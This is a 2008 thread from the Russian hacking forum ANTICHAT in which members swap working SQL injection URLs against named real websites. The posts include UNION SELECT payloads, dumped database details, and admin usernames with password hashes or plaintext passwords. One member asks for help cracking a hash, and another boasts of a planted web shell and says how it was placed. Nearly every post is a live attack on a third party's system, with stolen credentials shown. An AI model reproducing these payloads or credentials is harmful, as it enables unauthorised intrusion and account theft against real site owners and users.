HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.07.2008, 12:02
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами: 9454841

Репутация: 504


По умолчанию

Цитата:
Сообщение от sabe  
http://www.cesvot.it/usr_view.php/ID=-1%20union%20select%201,2,3,4,5,6,7--
я тут вообще инъекции не увидел
Цитата:
Сообщение от sabe  
http://www.freewebtemplates.com/template.php?id=3&start=99999'
тут кстати тоже...

Последний раз редактировалось gisTy; 05.07.2008 в 12:14..
 
Ответить с цитированием

  #2  
Старый 05.07.2008, 12:09
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

http://www.roviniete.ro/detalii_vignete_europa.php?id=1+union+select+1,con cat_ws(0x3a,user(),version(),database()),3+limit+1 ,1/*

Database Version: 5.0.45
Database name: rovini_roviniete
User name: rovini_usrrovi@localhost

admins :

dan:7c4014be271c668dffa7911537fc3203
rbd:8b6a8a4e9fd167ad9dfeabd502ebace3: makaveli

админку не нашел...
на морде есть логин для клиентов

http://www.santo-raphael.ro/product.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,concat_ws(0x3a,version(),user(),database()) ,14,15,16,17,18+limit+1,1/*


Database Version: 4.1.14
Database name: shop
User name: admin@localhost

tables
admin колонки которые подобрал не интересные: email,id, phone
mysql.user колонки pasword, user

admin:2ef439381b2bdf7b: galeon
usr_market:2ef439381b2bdf7b : galeon

админку не искал..на морде логин для клиентов

Последний раз редактировалось Gorev; 05.07.2008 в 12:36..
 
Ответить с цитированием

  #3  
Старый 05.07.2008, 18:07
mefish
Познающий
Регистрация: 13.04.2008
Сообщений: 42
С нами: 9513970

Репутация: 35
Red face

www.02.ru - Правоохранительный портал

_http://www.02.ru/zakon/index.php?id_mz=15+union+select+1,concat_ws(0x3a,u ser(),version(),database()),3,4/*


USER: ru183180_02ru@localhost
VERSION: 4.0.27-log
DATABASE: ru183180_02rudb

Они даже себя засчищать не хотят
 
Ответить с цитированием

  #4  
Старый 05.07.2008, 18:42
LUKAC
Новичок
Регистрация: 19.08.2007
Сообщений: 18
С нами: 9856542

Репутация: 8
По умолчанию

http://www.slamdunk.ro/stire.php?id=-400+union+select+1,2,3,4,5,6,7,8,9/*

http://www.ccimm.ro/search/show.php?id=-131'+union+select+1,2,3,4,5,6,concat_ws(char(58),u sername,password),8,9,0,1,2,3,4,5+from+user/*
 
Ответить с цитированием

  #5  
Старый 05.07.2008, 23:40
[Illuminati]
Banned
Регистрация: 05.07.2008
Сообщений: 2
С нами: 9394946

Репутация: 2
По умолчанию

http://www.lexisnexis.ca/bookstore/bookinfo.php?pid=-20+union+select+1,cast(version()+as+binary),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
 
Ответить с цитированием

  #6  
Старый 06.07.2008, 21:38
barracuda
Новичок
Регистрация: 21.08.2005
Сообщений: 3
С нами: 10905493

Репутация: 0
Unhappy

http://www.bankrollmob.com/forum.asp?mode=thread&id=-32278%20union%20select%20pwd,2%20from%20admin

Password: 75ea14129638ac5c2bd34c0a615dfe7f

Please crack for me password. Help me
 
Ответить с цитированием

  #7  
Старый 06.07.2008, 00:13
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами: 9949072

Репутация: 237
По умолчанию

Код:
http://www.vip-gsm.ru/spec.php?id=-573'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x2F,user,password),13,14,15,16,17,18+from+mysql.user/*
Version: 4.1.18
User/Pass: root/40cdfeb7631887f0
 
Ответить с цитированием

  #8  
Старый 06.07.2008, 00:34
[Illuminati]
Banned
Регистрация: 05.07.2008
Сообщений: 2
С нами: 9394946

Репутация: 2
По умолчанию

K1nD[e]R, на вип джи эс эм у меня уже давно шелл лежит, там file_priv =Y b кавычки не экранируются, в ошибке путь виден, папка на заливку sql/images вроде,
 
Ответить с цитированием

  #9  
Старый 06.07.2008, 01:08
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами: 9949072

Репутация: 237
По умолчанию

Код:
http://shirley.ru/cat.php?id=-3+union+select+concat_ws(0x2F,uid,uname,pass),2+from+shir_users+limit+3,3/*
Version: 5.0.33

uname/pass : Алексей/c6f057b86584942e415435ffb1fa93d4
P.S юзаем (limit+x,x) для вывода юзеров=)
 
Ответить с цитированием

  #10  
Старый 06.07.2008, 01:39
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами: 9949072

Репутация: 237
По умолчанию

Код:
http://www.ixbt.com/news/news.php?id=-1+union+select+1,2,concat_ws(0x2F,name,password),version(),5,6,7,8,9,10,11+from+user+limit+3,3/*
Version: 4.0.27
name/pass: Administrator/another_enter
P.S юзаем (limit+x,x) для вывода юзеров=)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...